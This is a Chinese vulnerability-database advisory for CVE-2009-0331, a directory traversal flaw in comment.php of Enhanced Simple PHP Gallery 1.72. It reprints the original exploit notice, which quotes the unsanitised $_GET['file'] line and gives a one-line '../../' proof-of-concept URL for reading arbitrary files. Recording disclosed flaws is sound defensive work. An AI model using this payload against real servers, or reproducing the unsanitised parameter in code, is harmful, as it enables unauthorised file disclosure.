Quirm Enhanced Simple PHP Gallery comment.php目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117257 漏洞类型 路径遍历
发布时间 2009-01-18 更新时间 2009-01-30
CVE编号 CVE-2009-0331 CNNVD-ID CNNVD-200901-427
漏洞平台 PHP CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/7819
https://cxsecurity.com/issue/WLB-2009020067
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-427
|漏洞详情
EnhancedSimplePHPGallery(ESPG)1.72版本中的gallery/comment.php存在目录遍历漏洞。远程攻击者可以借助文件参数中的"..",读取任意文件。
|漏洞EXP
.::ESPG 1.72 File Disclosure Vulnerability::.
 
 

 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net
 
 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Contact: bd0rk[at]hackermail.com

 => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

    
                     => 'GAINST WAR IN ISRAEL AND GAZA!!! <=

# milw0rm.com [2009-01-18]
|参考资料

来源:XF
名称:espg-comment-directory-traversal(48087)
链接:http://xforce.iss.net/xforce/xfdb/48087
来源:BID
名称:33335
链接:http://www.securityfocus.com/bid/33335
来源:MILW0RM
名称:7819
链接:http://www.milw0rm.com/exploits/7819